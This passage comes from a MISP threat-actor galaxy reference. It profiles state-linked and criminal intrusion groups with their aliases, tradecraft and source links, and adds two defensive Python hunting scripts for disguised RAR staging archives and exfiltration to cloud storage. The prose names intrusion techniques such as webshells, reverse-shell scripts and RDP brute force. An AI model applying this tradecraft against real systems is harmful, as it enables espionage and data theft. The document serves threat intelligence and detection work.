  • Gonjeshke Darande

Table 12122. Table References

Links

https://www.bbc.com/news/technology-62072480

https://twitter.com/cpresearch/status/1541753913732366338

https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/

DEV-0586

MSTIC has not found any notable associations between this observed activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware (WhisperGate), which is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom.

The tag is: misp-galaxy:threat-actor="DEV-0586"

DEV-0586 is also known as:

  • Ruinous Ursa

  • Cadet Blizzard

DEV-0586 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Cadet Blizzard" with estimative-language:likelihood-probability="likely"

Table 12123. Table References

Links

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://unit42.paloaltonetworks.com/atoms/ruinousursa/

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Kinsing

Kinsing is a Linux cryptojacking operation, tracked by Unit 42 as Money Libra, that targets misconfigured or vulnerable cloud workloads, in particular exposed Docker daemon APIs and Kubernetes clusters, as well as internet-facing applications with known vulnerabilities. Once on a host it deploys the Kinsing malware, which kills competing miners, runs a Monero miner (observed as the kdevtmpfsi process), persists through cron jobs, and has been seen using a rootkit to hide its activity.

The tag is: misp-galaxy:threat-actor="Kinsing"

Kinsing is also known as:

  • Money Libra

Table 12124. Table References

Links

https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

https://unit42.paloaltonetworks.com/atoms/moneylibra/

Earth Berberoka

According to TrendMicro, Earth Berberoka is a threat group originating from China that mainly focuses on targeting gambling websites. The group’s campaign uses multiple malware families, attributed to Chinese-speaking actors, that target the Windows, Linux, and macOS platforms. Aside from using tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, Earth Berberoka has also developed a brand-new, complex, multistage malware family, which has been dubbed PuppetLoader.

The tag is: misp-galaxy:threat-actor="Earth Berberoka"

Earth Berberoka is also known as:

  • GamblingPuppet

Table 12125. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt

https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt

https://documents.trendmicro.com/assets/txt/earth-berberoka-domains-2.txt

https://www.youtube.com/watch?v=QXGO4RJaUPQ

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/

https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html

Earth Lusca

Earth Lusca is a threat actor from China that targets organizations of interest to the Chinese government, including academic institutions, telecommunication companies, religious organizations, and other civil society groups. Earth Lusca’s tools closely resemble those used by Winnti Umbrella, but the group appears to operate separately from Winnti. Earth Lusca has also been observed targeting cryptocurrency payment platforms and cryptocurrency exchanges in what are likely financially motivated attacks.

The tag is: misp-galaxy:threat-actor="Earth Lusca"

Earth Lusca is also known as:

  • CHROMIUM

  • ControlX

  • TAG-22

  • FISHMONGER

  • BRONZE UNIVERSITY

  • AQUATIC PANDA

  • Red Dev 10

  • RedHotel

  • Charcoal Typhoon

Earth Lusca has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Charcoal Typhoon" with estimative-language:likelihood-probability="likely"

Table 12126. Table References

Links

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E

https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf

https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools

https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

Earth Wendigo

Earth Wendigo is a threat actor from China that has been targeting several organizations — including government organizations, research institutions, and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely used in Taiwan. The threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.

The tag is: misp-galaxy:threat-actor="Earth Wendigo"

Table 12127. Table References

Links

https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html

BRONZE EDGEWOOD

In early 2021 CTU researchers observed BRONZE EDGEWOOD exploiting the Microsoft Exchange Server of an organization in Southeast Asia. The threat group deployed a China Chopper webshell and ran the Nishang Invoke-PowerShellTcp.ps1 script to connect back to C2 infrastructure. The threat group is publicly linked to the malware families Chinoxy, PCShare and FunnyDream. CTU researchers have discovered that BRONZE EDGEWOOD also leverages Cobalt Strike in its intrusion activity. BRONZE EDGEWOOD has been active since at least 2018 and targets government and private enterprises across Southeast Asia. CTU researchers assess with moderate confidence that BRONZE EDGEWOOD operates on behalf of the Chinese government and has a remit that covers political espionage.

The tag is: misp-galaxy:threat-actor="BRONZE EDGEWOOD"

BRONZE EDGEWOOD is also known as:

  • Red Hariasa

Table 12128. Table References

Links

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

APT9

APT9 engages in cyber operations where the goal is data theft, usually focusing on the data and projects that make a particular organization competitive within its field. APT9 was historically very active in the pharmaceuticals and biotechnology industry. We have observed this actor use spearphishing, valid accounts, and remote services for initial access. On at least one occasion, Mandiant observed APT9 at two companies in the biotechnology industry and suspects that APT9 actors may have gained initial access to one of the companies by using a trusted relationship between the two companies. APT9 uses a wide range of backdoors, including publicly available backdoors, as well as backdoors that are believed to be custom but are used by multiple APT groups.

The tag is: misp-galaxy:threat-actor="APT9"

APT9 is also known as:

  • NIGHTSHADE PANDA

  • Red Pegasus

  • Group 27

Table 12129. Table References

Links

https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.mandiant.com/resources/insights/apt-groups

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://news.softpedia.com/news/trochilus-rat-evades-antivirus-detection-used-for-cyber-espionage-in-south-east-asia-498776.shtml

https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

BRONZE SPRING

BRONZE SPRING is a threat group that CTU researchers assess with high confidence operates on behalf of China in the theft of intellectual property from defense, engineering, pharmaceutical and technology companies. The threat group typically uses scan-and-exploit for initial access, deploys the China Chopper webshell for remote execution and persistence, and creates RAR archives with a '.jpg' file extension for data exfiltration. In July 2020 the U.S. Department of Justice indicted two Chinese hackers CTU researchers assess are members of the BRONZE SPRING threat group. The Department of Justice alleges these hackers were responsible for compromising the networks of hundreds of organisations and individuals in the U.S. and abroad since 2009, and that exfiltrated data would be passed to the Chinese Ministry of State Security or sold for financial gain.
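
The '.jpg'-named RAR archives are cheap to hunt for, because the extension lies but the file header does not. The Python below is an added example, not Secureworks' or the galaxy's code: it reads the first bytes of every file under a directory and reports image-named files that actually begin with a RAR4 or RAR5 signature. The sample tree it writes to a temporary directory is constructed, and the set of image extensions is an assumption; the same header-versus-extension check generalises to any staging format an actor chooses to disguise.

```python
"""Find RAR archives disguised with image extensions (added example)."""
import os
import tempfile
from typing import Optional

# File signatures. RAR4 is 7 bytes, RAR5 is 8 bytes; both start with "Rar!".
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
JPEG_MAGIC = b"\xff\xd8\xff"

# Assumption: the extensions an actor would pick to look like harmless images.
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}


def sniff(head: bytes) -> Optional[str]:
    """Identify a file from its leading bytes; RAR5 is tested first because
    its signature extends the RAR4 prefix."""
    if head.startswith(RAR5_MAGIC):
        return "rar5"
    if head.startswith(RAR4_MAGIC):
        return "rar4"
    if head.startswith(JPEG_MAGIC):
        return "jpeg"
    return None


def is_disguised_archive(path: str, head: bytes) -> bool:
    """True when the name claims an image but the content is a RAR archive."""
    ext = os.path.splitext(path)[1].lower()
    return ext in IMAGE_EXTENSIONS and sniff(head) in ("rar4", "rar5")


def find_disguised_archives(root: str):
    """Walk root and return paths (relative to root) of disguised archives."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    head = fh.read(8)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if is_disguised_archive(full, head):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed sample files in a temp directory (not real artefacts)."""
    root = tempfile.mkdtemp(prefix="bronze_spring_")
    samples = {
        "holiday.jpg": JPEG_MAGIC + b"\xe0" + b"\x00" * 64,  # real JPEG header
        "photo1.jpg": RAR4_MAGIC + b"\x00" * 64,             # RAR4 named .jpg
        "scan_002.jpg": RAR5_MAGIC + b"\x00" * 64,           # RAR5 named .jpg
        "backup.rar": RAR4_MAGIC + b"\x00" * 64,             # honest name, not flagged
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for hit in find_disguised_archives(build_sample_tree()):
        print("disguised archive:", hit)
```

Reading only eight bytes per file keeps a sweep of a web root or upload directory cheap, and flagging on the header rather than on the extension catches the opposite trick too (an archive renamed to anything that is not an archive).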

The tag is: misp-galaxy:threat-actor="BRONZE SPRING"

BRONZE SPRING is also known as:

  • UNC302

Table 12130. Table References

Links

https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion

https://www.justice.gov/opa/press-release/file/1295981/download

https://www.justice.gov/opa/press-release/file/1295986/download

https://intrusiontruth.wordpress.com/2021/05/06/an-apt-with-no-name

https://twitter.com/MrDanPerez/status/1390285821786394624

BRONZE STARLIGHT

BRONZE STARLIGHT has been active since mid-2021 and targets organizations globally across a range of industry verticals. The group leverages HUI Loader to load Cobalt Strike and PlugX payloads for command and control. CTU researchers have observed BRONZE STARLIGHT deploying ransomware to compromised networks as part of name-and-shame ransomware schemes and posting victim names to leak sites. CTU researchers assess with moderate confidence that BRONZE STARLIGHT is located in China, based on observed tradecraft including the use of HUI Loader and PlugX, which are associated with China-based threat group activity. It is plausible that BRONZE STARLIGHT deploys ransomware as a smokescreen rather than for financial gain, with the underlying motivation being intellectual property theft or espionage.

The tag is: misp-galaxy:threat-actor="BRONZE STARLIGHT"

BRONZE STARLIGHT is also known as:

  • SLIME34

  • DEV-0401

  • Cinnamon Tempest

  • Emperor Dragonfly

BRONZE STARLIGHT has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Cinnamon Tempest" with estimative-language:likelihood-probability="likely"

Table 12131. Table References

Links

https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility

https://twitter.com/cglyer/status/1480734487000453121

https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group

https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

BRONZE HIGHLAND

BRONZE HIGHLAND has been observed using spearphishing as an initial infection vector to deploy the MgBot remote access trojan against targets in Hong Kong. Third-party reporting suggests the threat group also targets India, Malaysia and Taiwan and leverages Cobalt Strike and the KsRemote Android RAT. CTU researchers assess with moderate confidence that BRONZE HIGHLAND operates on behalf of China and has a remit covering espionage against domestic human rights and pro-democracy advocates and nations neighbouring China.

The tag is: misp-galaxy:threat-actor="BRONZE HIGHLAND"

BRONZE HIGHLAND is also known as:

  • Evasive Panda

  • Daggerfly

Table 12132. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware

https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf

https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s

https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/

BRONZE SPIRAL

In December 2020, the IT management software provider SolarWinds announced that an unidentified threat actor had exploited a vulnerability in their Orion Platform software to deploy a web shell dubbed SUPERNOVA. CTU researchers track the operators of the SUPERNOVA web shell as BRONZE SPIRAL and assess with low confidence that the group is of Chinese origin. SUPERNOVA was likely deployed through exploitation of CVE-2020-10148, and CTU researchers observed post-exploitation reconnaissance commands roughly 30 minutes before the web shell was deployed. This may have been indicative of the threat actor conducting scan-and-exploit activity and then triaging for victims of particular interest, before deploying SUPERNOVA and attempting to dump credentials and move laterally.

BRONZE SPIRAL has been associated with previous intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property. The threat group makes extensive use of native system tools and 'living off the land' techniques.

The tag is: misp-galaxy:threat-actor="BRONZE SPIRAL"

Table 12133. Table References

Links

https://unit42.paloaltonetworks.com/solarstorm-supernova

https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis

https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group

https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

https://www.cisa.gov/news-events/analysis-reports/ar21-112a

BRONZE VAPOR

BRONZE VAPOR is a targeted threat group assessed with moderate confidence to be of Chinese origin. Artefacts from tools associated with this group and open source reporting on related incidents indicate that BRONZE VAPOR has operated since at least 2017. The group conducts espionage against multiple industries including semiconductors, aviation and telecommunications. CTU researchers assess BRONZE VAPOR’s intent to be information theft, with operations focused on intellectual property (semiconductors) and personally identifiable information such as traveller records (aviation). Compromise of telecommunications companies can yield personally identifiable information and metadata on client communications such as Call Data Records (CDR).

Prior to 2019 their operational focus, with some exceptions, revolved around targets in East Asia, particularly Taiwan with its thriving semiconductor industry. In 2021 details emerged in open source of attacks on at least one European semiconductor company believed to date back to 2017. In 2019 BRONZE VAPOR attacked one or more entities in the European airlines sector. The group gains initial access via VPN services, may use spearphishing with 'Letter of Appointment' themed lures, and deploys Cobalt Strike along with custom data exfiltration tools against target organizations. Post-intrusion activity involves living off the land using legitimate tools and commands available within the victim environment, as well as using AceHash for credential harvesting, WATERCYCLE for data exfiltration and STOCKPIPE for proxying information through Microsoft Exchange servers over email.

BRONZE VAPOR uses a set of tactics that, although not individually unique, when viewed in aggregate create a relatively distinct playbook. Intrusions begin with credential-based attacks against an existing remote access solution (Citrix, VPN etc.) or B2B network access. Cobalt Strike is deployed into the environment and further access is then conducted via Cobalt Strike Beacon and other features of the platform. SharpHound is deployed to map out the victim’s Active Directory infrastructure and collect critical information about the domain, including important account names. Command and control infrastructure is hosted on subdomains of Azure and Appspot services to blend in with legitimate traffic. The threat actor also registers its own domains for command and control, often with a "sync" or "update" related theme. WinRAR is commonly used for compressing data prior to exfiltration. Filenames for these archives often involve a string of numbers and variations of the word "update". Data is exfiltrated using WATERCYCLE to cloud-based platforms such as OneDrive and Google Drive.
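
The playbook above lends itself to retrospective hunting precisely because the signals are only distinctive in aggregate. The Python below is an added example, not code from Secureworks or from the galaxy: it scores each internal source against three of the described signals over constructed proxy and file-creation log lines, namely archive names that pair a run of digits with an "update" variant, connections to "sync"/"update"-themed hostnames (weighted higher when they sit on Azure or Appspot subdomains), and uploads to OneDrive or Google Drive. Cloud subdomains on their own are deliberately not scored, since the point of that hosting is to look like everything else. The log formats, the weights, the priority threshold and the small known-good allowlist are assumptions to be tuned per environment.

```python
"""Hunting for the BRONZE VAPOR-style playbook in proxy and file logs (added example)."""
import re
from collections import defaultdict

# Constructed sample proxy log: "<utc-time> <source-ip> <host> <method> <path>".
PROXY_LOG = """\
2019-06-03T02:14:07Z 10.20.5.17 officesync-update.azurewebsites.net POST /api/v1/beacon
2019-06-03T02:14:09Z 10.20.5.17 update.microsoft.com GET /check
2019-06-03T03:02:44Z 10.20.5.17 win-sync-update.com POST /api/check
2019-06-03T04:11:02Z 10.20.5.17 onedrive.live.com PUT /upload
2019-06-03T01:55:10Z 10.20.7.3 www.example.org GET /
2019-06-03T01:57:31Z 10.20.7.3 drive.google.com GET /drive/my-drive
""".splitlines()

# Constructed sample file-creation events: "<utc-time> <host-ip> <path>".
FILE_LOG = r"""2019-06-03T03:58:00Z 10.20.5.17 C:\Users\Public\update20190603.rar
2019-06-03T03:59:00Z 10.20.5.17 C:\ProgramData\updates_001122.rar
2019-06-03T03:59:30Z 10.20.7.3 C:\Users\bob\Documents\report.zip
""".splitlines()

CLOUD_SUFFIXES = (".azurewebsites.net", ".cloudapp.azure.com", ".appspot.com")
STORAGE_HOSTS = ("onedrive.live.com", "1drv.ms", "drive.google.com")
KNOWN_GOOD_SUFFIXES = (".microsoft.com", ".windowsupdate.com")  # assumption: tune per environment
THEME = re.compile(r"sync|updat", re.IGNORECASE)
PRIORITY_THRESHOLD = 5  # assumption: one themed C2 host plus one staging archive


def is_staging_archive(path):
    """RAR/ZIP/7z whose name carries an 'update' variant and a run of 4+ digits."""
    name = re.split(r"[\\/]", path)[-1]
    return bool(re.search(r"\.(rar|zip|7z)$", name, re.I)
                and re.search(r"updat", name, re.I)
                and re.search(r"\d{4,}", name))


def classify_host(host):
    """Tag a hostname; known-good suffixes are skipped to cut the obvious noise."""
    h = host.lower().rstrip(".")
    tags = []
    if h.endswith(KNOWN_GOOD_SUFFIXES):
        return tags
    if h.endswith(CLOUD_SUFFIXES):
        tags.append("cloud-subdomain")
    if THEME.search(h):
        tags.append("themed-name")
    if h in STORAGE_HOSTS or h.endswith(tuple("." + s for s in STORAGE_HOSTS)):
        tags.append("cloud-storage")
    return tags


def hunt(proxy_lines=PROXY_LOG, file_lines=FILE_LOG):
    """Aggregate weighted findings per internal source address."""
    findings = defaultdict(lambda: {"c2_candidates": [], "cloud_storage": [],
                                    "staging_archives": [], "score": 0})
    for line in proxy_lines:
        _ts, src, host, _method, _path = line.split(maxsplit=4)
        tags = classify_host(host)
        f = findings[src]
        if "themed-name" in tags:
            f["c2_candidates"].append(host)
            f["score"] += 3 if "cloud-subdomain" in tags else 2
        if "cloud-storage" in tags:
            f["cloud_storage"].append(host)
            f["score"] += 1  # weak on its own: legitimate use is common
    for line in file_lines:
        _ts, src, path = line.split(maxsplit=2)
        if is_staging_archive(path):
            f = findings[src]
            f["staging_archives"].append(re.split(r"[\\/]", path)[-1])
            f["score"] += 3
    return dict(findings)


def prioritized(findings, threshold=PRIORITY_THRESHOLD):
    """Sources worth an analyst's time, highest score first."""
    hot = [s for s, f in findings.items() if f["score"] >= threshold]
    return sorted(hot, key=lambda s: -findings[s]["score"])


if __name__ == "__main__":
    results = hunt()
    for src in prioritized(results):
        print(src, results[src])
```

In the constructed data the host that beacons to a themed Azure subdomain, talks to a sync/update domain, stages two "update" archives and uploads to OneDrive scores 12, while a user who merely opened Google Drive scores 1 and is never surfaced. The natural next step, not shown here, is to weight cloud subdomains by how new or rare they are in the organisation's own traffic rather than by name.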

The tag is: misp-galaxy:threat-actor="BRONZE VAPOR"

Table 12134. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-vapor

Vicious Panda

Check Point Research discovered a new campaign against the Mongolian public sector, which takes advantage of the current Coronavirus scare, in order to deliver a previously unknown malware implant to the target. A closer look at this campaign allowed us to tie it to other operations which were carried out by the same anonymous group, dating back to at least 2016. Over the years, these operations targeted different sectors in multiple countries, such as Ukraine, Russia, and Belarus.

The tag is: misp-galaxy:threat-actor="Vicious Panda"

Vicious Panda is also known as:

  • SixLittleMonkeys

Table 12135. Table References

Links

https://securelist.com/microcin-is-here/97353

https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign

https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf

https://securelist.com/apt-trends-report-q2-2019/91897

https://securelist.com/apt-trends-report-q2-2020/97937

https://securelist.com/it-threat-evolution-q2-2020/98230

https://securelist.com/apt-trends-report-q3-2021/104708

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

Red Nue

Red Nue, active since at least 2017, is known for its use of the multi-platform LootRAT backdoor, also known as ReverseWindow. LootRAT has variants for Windows and Macintosh (reported in open source as Demsty), as well as an Android variant known as SpyDealer. Red Nue has also used another Windows backdoor known as WinDealer since at least 2019, when it deployed it to targets as part of a watering hole campaign on a Chinese news website for the Chinese diaspora community. Parts of Asia feature heavily in Red Nue’s victimology.

The tag is: misp-galaxy:threat-actor="Red Nue"

Red Nue is also known as:

  • LuoYu

Table 12136. Table References

Links

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf

https://blogs.jpcert.or.jp/en/2021/10/windealer.html

https://securelist.com/windealer-dealing-on-the-side/105946

https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

Pickaxe

Prying Libra, also known as Pickaxe, is a threat actor active since at least August 2017, and it continues to remain active to this day. The adversary’s goal is to install and maintain a popular cryptocurrency miner on the victim’s machine. The miner in question is an open-source tool named XMRig that generates the Monero cryptocurrency. Malware is delivered via downloads through the popular Adfly advertisement platform. Users are often misled into clicking on a malicious advertisement, which results in the payload being delivered to the victim. Once installed, the malware leverages VBS scripts and redirection services, such as bitly, to ultimately download and execute XMRig. Over 15 million confirmed victims have been discovered to be infected in recent campaigns, with the actual number likely to be between 30 and 45 million victims. The victims are found across the globe, with high concentrations in Thailand, Vietnam, Egypt, Indonesia, and Turkey.

The tag is: misp-galaxy:threat-actor="Pickaxe"

Pickaxe is also known as:

  • Prying Libra

Table 12137. Table References

Links

https://unit42.paloaltonetworks.com/atoms/pryinglibra/

Watchdog

Thief Libra is a cloud-focused threat group with a history of cryptojacking operations as well as cloud service platform credential scraping. It was first known to operate on January 27, 2019. The group uses a variety of custom-built Go scripts as well as repurposed cryptojacking scripts from other groups, including TeamTNT. It is currently considered an opportunistic threat group that targets exposed cloud instances and applications.

The tag is: misp-galaxy:threat-actor="Watchdog"

Watchdog is also known as:

  • Thief Libra

Table 12138. Table References

Links

https://unit42.paloaltonetworks.com/atoms/thieflibra/

Returned Libra

Returned Libra, also known as 8220 Mining Group, is a cloud threat actor group that has been active since at least 2017. Tools commonly employed during its operations are PwnRig and DBUsed, which are customized variants of the XMRig Monero mining software. The Returned Libra mining group is believed to have originated from a GitHub fork of the Rocke group’s software. Returned Libra has elevated its mining operations with the use of cloud service platform credential scraping.

The tag is: misp-galaxy:threat-actor="Returned Libra"

Returned Libra is also known as:

  • 8220 Mining Group

Table 12139. Table References

Links

https://unit42.paloaltonetworks.com/atoms/returnedlibra/

SLIME29

The tag is: misp-galaxy:threat-actor="SLIME29"

Table 12141. Table References

Links

https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf

GOBLIN PANDA

Goblin Panda is one of a handful of elite Chinese advanced persistent threat (APT) groups. Most Chinese APTs target the United States and NATO, but Goblin Panda focuses primarily on Southeast Asia.

The tag is: misp-galaxy:threat-actor="GOBLIN PANDA"

GOBLIN PANDA is also known as:

  • Conimes

  • Cycldek

Table 12142. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://www.fortinet.com/blog/threat-research/cta-security-playbook---goblin-panda.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf

TA558

Since 2018, security researchers have tracked a financially motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads.

The tag is: misp-galaxy:threat-actor="TA558"

PARINACOTA

One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as its payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months it has mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby it attempts to infiltrate a machine in a network and proceeds to ransom it in less than an hour. There are outlier campaigns in which it attempts reconnaissance and lateral movement, typically when it lands on a machine and network that allow it to move quickly and easily throughout the environment.

PARINACOTA typically brute-forces its way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activity against targets outside the network. This allows the group to expand the compromised infrastructure under its control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that it has compromised or has prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute-force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortex, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks.

PARINACOTA, however, has also been observed to adapt to any path of least resistance it can utilize. For instance, it sometimes discovers unpatched systems and uses disclosed vulnerabilities to gain initial access or elevate privileges.

The tag is: misp-galaxy:threat-actor="PARINACOTA"

PARINACOTA is also known as:

  • Wine Tempest

PARINACOTA has relationships with:

  • uses: misp-galaxy:ransomware="Wadhrama" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PARINACOTA" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Wine Tempest" with estimative-language:likelihood-probability="likely"

Table 12143. Table References

Links

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

Red Dev 17

In 2021, PwC started tracking a series of intrusions under the moniker Red Dev 17 that they assess were highly likely conducted by a China-based threat actor. Their analysis suggests Red Dev 17 has been active since at least 2017. Red Dev 17’s observed targets are mainly in India, and include the Indian military, a multinational India-based technology company, and a state energy company. They assess that it is highly probable that the threat actor behind intrusions associated with Red Dev 17 is also responsible for the campaign known in open source as Operation NightScout. Red Dev 17 is a user of the 8.t document weaponisation framework (also known as RoyalRoad), and abuses benign utilities such as Logitech or Windows Defender binaries to sideload and execute Chinoxy or PoisonIvy variants on victim systems. They identified capability and infrastructure links between Red Dev 17 and the threat actor they call Red Hariasa (aka FunnyDream APT), as well as infrastructure overlaps with Red Wendigo (aka Icefog, RedFoxtrot) and with ShadowPad C2 servers. At this time, they do not have sufficient evidence to directly link Red Dev 17 to any of these threat actors. However, they assess with realistic probability that Red Dev 17 operates within a cluster of threat 